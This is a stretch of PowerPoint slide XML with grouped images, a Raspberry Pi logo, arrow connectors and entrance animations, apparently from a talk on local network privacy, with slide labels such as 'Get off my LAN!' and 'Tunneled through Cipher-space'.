        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3117563" y="4979536"/>
            <a:ext cx="990600" cy="1076207"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3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40" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3132552" y="3829538"/>
            <a:ext cx="990600" cy="1076207"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4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43" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4433082" y="4979536"/>
            <a:ext cx="990600" cy="1076207"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4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8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6393953" y="1440257"/>
            <a:ext cx="990600" cy="1130002"/>
            <a:chOff x="6681968" y="5177388"/>
            <a:chExt cx="990600" cy="1130002"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6681968" y="5231183"/>
              <a:ext cx="990600" cy="1076207"/>
              <a:chOff x="2675122" y="4648672"/>
              <a:chExt cx="990600" cy="1076207"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32"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pic>
          <p:nvPicPr>
            <p:cNvPr id="64" name="Picture 6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46765" y="5177388"/>
              <a:ext cx="831028" cy="1038785"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4419600" y="3581400"/>
            <a:ext cx="1025525" cy="1295400"/>
            <a:chOff x="4419600" y="3581400"/>
            <a:chExt cx="1025525" cy="1295400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="Picture 45" descr="475px-Raspberry_Pi_Logo.sv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581400"/>
              <a:ext cx="1025525" cy="1295400"/>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4114800"/>
              <a:ext cx="583461" cy="583461"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="70" name="Group 69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5807101" y="4979536"/>
            <a:ext cx="990600" cy="1076207"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1974135" y="3538947"/>
            <a:ext cx="1821974" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get off my LAN!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67" name="Straight Arrow Connector 66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5410200" y="2570259"/>
            <a:ext cx="1479053" cy="1087341"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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5332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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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 presetClass="entr" presetSubtype="9"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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="5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Tunneled through Cipher-space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="713520" y="3231559"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1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25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1469045" y="1220105"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2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31" name="Group 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3288635" y="3145615"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32"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34" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3027328" y="2220318"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3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37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="939293" y="2001061"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3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40" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3510172" y="1156124"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4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43" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4637239" y="1805108"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Straight Arrow Connector 57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="0"/>
            <a:endCxn id="44" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3602023" y="2454229"/>
            <a:ext cx="1358384" cy="691386"/>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1" idx="2"/>
            <a:endCxn id="33" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3602023" y="3145615"/>
            <a:ext cx="1531847" cy="137578"/>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4" idx="1"/>
            <a:endCxn id="41" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4156508" y="1506502"/>
            <a:ext cx="480731" cy="64898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3"/>
            <a:endCxn id="65" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1359856" y="3369726"/>
            <a:ext cx="428853" cy="212211"/>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0"/>
            <a:endCxn id="35" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2102097" y="2869439"/>
            <a:ext cx="1248399" cy="149909"/>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1" idx="1"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2115381" y="1506502"/>
            <a:ext cx="1394791" cy="63981"/>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6" idx="0"/>
            <a:endCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3340716" y="1805245"/>
            <a:ext cx="492624" cy="415073"/>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8" idx="2"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1026908" y="2650182"/>
            <a:ext cx="235553" cy="58137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5" idx="3"/>
            <a:endCxn id="44" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3673664" y="2155486"/>
            <a:ext cx="963575" cy="41521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5" idx="1"/>
            <a:endCxn id="38" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1585629" y="2351439"/>
            <a:ext cx="1441699" cy="219257"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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8" idx="3"/>
            <a:endCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1585629" y="1805245"/>
            <a:ext cx="2247711" cy="54619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6" idx="3"/>
            <a:endCxn id="76" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2115381" y="1570483"/>
            <a:ext cx="3008709" cy="1063589"/>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2"/>
            <a:endCxn id="35" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3673664" y="2454229"/>
            <a:ext cx="1286743" cy="11646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1" idx="2"/>
            <a:endCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1359856" y="1805245"/>
            <a:ext cx="2473484" cy="1776692"/>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8" idx="2"/>
            <a:endCxn id="65" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262461" y="2650182"/>
            <a:ext cx="526248" cy="71954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2"/>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1252681" y="1869226"/>
            <a:ext cx="539532" cy="131835"/>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2"/>
            <a:endCxn id="66" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2102097" y="3019348"/>
            <a:ext cx="3031773" cy="263845"/>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2" idx="1"/>
            <a:endCxn id="65" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2435045" y="3369726"/>
            <a:ext cx="853590" cy="12626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3"/>
            <a:endCxn id="76" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4156508" y="1506502"/>
            <a:ext cx="967582" cy="112757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5" idx="0"/>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1026908" y="1506502"/>
            <a:ext cx="2483264" cy="172505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1"/>
            <a:endCxn id="35" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3288635" y="2869439"/>
            <a:ext cx="61861" cy="62655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788709" y="3019348"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6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70" name="Group 69"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4810702" y="2634072"/>
            <a:ext cx="646336" cy="649121"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="71"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sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Rounded Rectangle 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243360" y="3949816"/>
            <a:ext cx="5091637" cy="2374784"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="36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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2399579" y="5418748"/>
            <a:ext cx="694073" cy="659264"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="114"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16" name="Group 115"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6401109" y="4268750"/>
            <a:ext cx="694073" cy="659264"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="117"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18" name="Picture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19" name="Group 118"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2377901" y="4268750"/>
            <a:ext cx="694073" cy="659264"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="120"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21" name="Picture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22" name="Group 121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3711571" y="5418748"/>
            <a:ext cx="694073" cy="659264"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="123"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25" name="Group 124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3726560" y="4268750"/>
            <a:ext cx="694073" cy="659264"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="126"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27" name="Picture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28" name="Group 127"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5027090" y="5418748"/>
            <a:ext cx="694073" cy="659264"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="129"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="131" name="Group 130"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6987961" y="1879469"/>
            <a:ext cx="694073" cy="692218"/>
            <a:chOff x="6681968" y="5177388"/>
            <a:chExt cx="990600" cy="1130002"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="132" name="Group 131"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6681968" y="5231183"/>
              <a:ext cx="990600" cy="1076207"/>
              <a:chOff x="2675122" y="4648672"/>
              <a:chExt cx="990600" cy="1076207"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="134"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35" name="Picture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pic>
          <p:nvPicPr>
            <p:cNvPr id="133" name="Picture 1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46765" y="5177388"/>
              <a:ext cx="831028" cy="1038785"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="140" name="Group 139"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6401109" y="5418748"/>
            <a:ext cx="694073" cy="659264"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="141"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75122" y="4734279"/>
              <a:ext cx="990600" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="142" name="Picture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522" y="4648672"/>
              <a:ext cx="655822" cy="655822"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Rectangle 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2900534" y="3978158"/>
            <a:ext cx="2463090" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get off my LAN!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="144" name="Straight Arrow Connector 143"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611803" y="3794736"/>
            <a:ext cx="1493597" cy="32006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71" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5133870" y="3283193"/>
            <a:ext cx="200130" cy="755407"/>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44" idx="3"/>
            <a:endCxn id="134" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5283575" y="2155486"/>
            <a:ext cx="1704386" cy="112790"/>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1"/>
            <a:endCxn id="41" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4156508" y="1506502"/>
            <a:ext cx="2831453" cy="761774"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="50000">
                  <a:srgbClr val="002060"/>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="FFFF00"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="00B050"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="0" scaled="0"/>
              <a:tileRect/>
            </a:gra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181600" y="4114800"/>
            <a:ext cx="720725" cy="914400"/>
            <a:chOff x="4419600" y="3581400"/>
            <a:chExt cx="1025525" cy="1295400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="90" name="Picture 89" descr="475px-Raspberry_Pi_Logo.sv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3581400"/>
              <a:ext cx="1025525" cy="1295400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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4114800"/>
              <a:ext cx="583461" cy="583461"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362748244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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="85"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="76" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="96" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="104" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="108" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="116" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="120" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="124" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="113"/>
                                        </p:tgtEl>
